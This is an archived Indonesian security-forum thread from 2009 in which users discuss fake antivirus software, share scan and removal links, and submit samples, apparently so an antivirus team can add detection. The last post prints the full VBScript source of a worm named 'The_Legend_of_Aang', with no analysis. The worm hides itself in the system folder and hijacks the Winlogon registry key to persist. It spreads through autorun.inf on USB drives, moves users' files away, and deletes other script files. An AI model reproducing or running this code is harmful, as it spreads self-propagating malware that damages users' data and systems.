View Full Version : Antivirus Palsu
f3rd1
04-01-2009, 11:33 AM
baru aja buka internet, eh udah dapet spyware baru...ansav lom bisa mendeteksi...
sample'y udah aku upload (AntivirusPalsu.zip), mohon segera dianalisis and update'y segera dirilis..
aku lom berani utak utik, ntar ndak malah berabe... :D
dibawah ini adalah link scan result dari VirusTotal.com
http://www.virustotal.com/analisis/f65b9f58e37a24963be7f5ac944735b4
and yang punya informasi seputar AV palsu, silakan sharing di sini...
regards
:bye:
f3rd1
dewaphobia
04-01-2009, 12:07 PM
lom ada gan...
yang penting, Pertamaxxx..............
wew AV Palsu, kayak di indonesia aja banyak Obat palsu :wacko:
widnyana putra
04-01-2009, 01:56 PM
dah pernah nemu... waktu itu otak lagi mereng, nyari hiburan berupa b*k*p.. eh di suru download codec n media playernya.. tp yang di bilang sebage codec itu malah AV palsu... untung di warnet... :))
dewaphobia
04-01-2009, 04:04 PM
wah, jgn2 warnet bnyk AV mentah palsu gara2 situ ya??? :shy::shy:
jk...
ansav-reporter
04-01-2009, 05:04 PM
AV palsu kayak gitu udah banyak beredar di Internet, seperti yang ada di situs download paling populer www.**p**.com (http://www.**p**.com) pada Front Pagenya ada screen shot berupa sebuah anti virus yang diakui sangat ampuh, dan setelah di download dan di install maka spyware masuk ke komputer kita dan antivius palsu tersebut berjalan sebagai mana mestinya, namun saat scan virus, file yang tidak mengandung virus dideteksi sebagai virus atau spyware, agar seolah-olah user bangga akan hebatnya AV palsu tersebut.
OK Sekedar Info.......
darkarchon
04-02-2009, 09:31 AM
ow antivirus palsu yah antivirus
saya ada removalnya
yang pertama MS antispyware 2009 << ini juga palsu
link removalnya
http://www.freewarefiles.com/downloads_counter.php?programid=47630
labi labi
04-02-2009, 11:18 AM
kayak obat aja ada yg palsu..
huhuehuehue
d41715h
04-02-2009, 05:23 PM
kayak obat aja ada yg palsu..
huhuehuehueiya kayak jamu aj:D
widnyana putra
04-02-2009, 05:57 PM
wah, jgn2 warnet bnyk AV mentah palsu gara2 situ ya??? :shy::shy:
jk...
wakakakakak.....
itulah gunanya deepfreeze.....
K4bayan
04-10-2009, 08:07 PM
nitip satu lagi, yg ini namnya The_legend_of_Aang
http://www.virustotal.com/analisis/303fafa464894bb9a7086ed9f9019e45
http://rapidshare.com/files/219670466/aang.rar.html
K4bayan
04-10-2009, 08:14 PM
The_Legend_of_Aang
Option Explicit
On Error Resume Next
Dim Fso
Set Fso = CreateObject(”Scripting.FileSystemObject”) Dim Shells
Set Shells = CreateObject(”Wscript.Shell”)
Dim WinDir
Set WinDir = Fso.GetSpecialFolder(0)
Dim SystemDir
Set SystemDir =Fso.GetSpecialFolder(1)
Dim File
Set File = Fso.GetFile(WScript.ScriptFullName)
Dim Drv
Set Drv=File.Drive
Dim InDrive
Set InDrive = Fso.drives
Dim ReadAll,AllFile
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline & vbcrlf
Loop
Dim Count
Count=Drv.DriveType
Dim WriteAll
Do
If Not Fso.FileExists(SystemDir & “\Aang.vbs”) then
set WriteAll = Fso.CreateTextFile(SystemDir & “\Aang.vbs”,2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & “\Aang.vbs”)
WriteAll.Attributes = -1
End If
Shells.RegWrite “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit”,SystemDir & “\userinit.exe,” & _
SystemDir & “\wscript.exe ” & SystemDir & “\Aang.vbs”
Dim Drives
For Each Drives In InDrive
If Drives.DriveType=2 Then
LookVBS “inf”,Drives.Path & “\”
LookVBS “INF”,Drives.Path & “\”
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path “A:” Then
Shells.Regdelete “HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\MS32DLL”
Shells.RegWrite “HKCU\Software\Microsoft\Internet Explorer\Main\Window Title”,”"
Shells.RegWrite “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”"
Shells.RegWrite “HKCR\vbsfile\DefaultIcon”,”%SystemRoot%\System32\ WScript.exe,2″
LookVBS “vbs”,WinDir & “\”
LookVBS “vbs”,Drives.Path & “\”
If Drives.DriveType = 1 Then
If Drives.Path”A:” Then
If Not Fso.FileExists(Drives.Path & “\The_Legend_Of_Aang.vbs”) Then
set writeall=fso.CreateFolder (SystemDir & “\RemovableCache”)
writeall.close
set writeall=fso.copyfolder (Drives.path & “\*”,SystemDir & “\RemovableCache”)
writeall.close
set writeall=fso.moveFile (Drives.path & “\*.*”,SystemDir & “\RemovableCache”)
writeall.close
’set writeall=fso.Deletefolder (Drives.path & “\*”,2)
writeall.close
’set writeall=fso.DeleteFile (Drives.path & “\*.*”,2)
writeall.close
Set WriteAll=Fso.CreateTextFile(Drives.Path & “\The_Legend_Of_Aang.vbs”,2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & “\The_Legend_Of_Aang.vbs”)
WriteAll.Attributes = -1
writeall.close
End If
If Fso.FileExists(Drives.Path & “\autorun.inf”) Or Fso.FileExists(Drives.Path & “\AUTORUN.INF”) Then
Dim Chg
Set Chg = Fso.GetFile(Drives.Path & “\autorun.inf”)
Chg.Attributes = -8
End if
Set WriteAll = Fso.CreateTextFile(Drives.Path & “\autorun.inf”,2,True)
WriteAll.writeline “[Autorun]” & vbcrlf & “UseAutoplay=1″ & vbcrlf & “Icon=%SystemRoot%\system32\SHELL32.dll,7″ & vbcrlf & “Shellexecute=wscript.exe The_Legend_Of_Aang.vbs” & vbCrLf & “Shell\OPEN\COMMAND=wscript.exe The_Legend_Of_Aang.vbs”& VbCrlf &”Shell\explore\COMMAND=wscript.exe The_Legend_Of_Aang.vbs” & VbCrLf & “Action=Open folder to view files”
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & “\autorun.inf”)
WriteAll.Attributes = -1
End If
End if
End if
End If
Next
if Count 1 then
Wscript.sleep 10000
end if
loop while Count1
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject(”Scripting.FileSystemObject”)
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name “The_Legend_Of_Aang.vbs” Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
vBulletin® v3.8.4, Copyright ©2000-2013, Jelsoft Enterprises Ltd.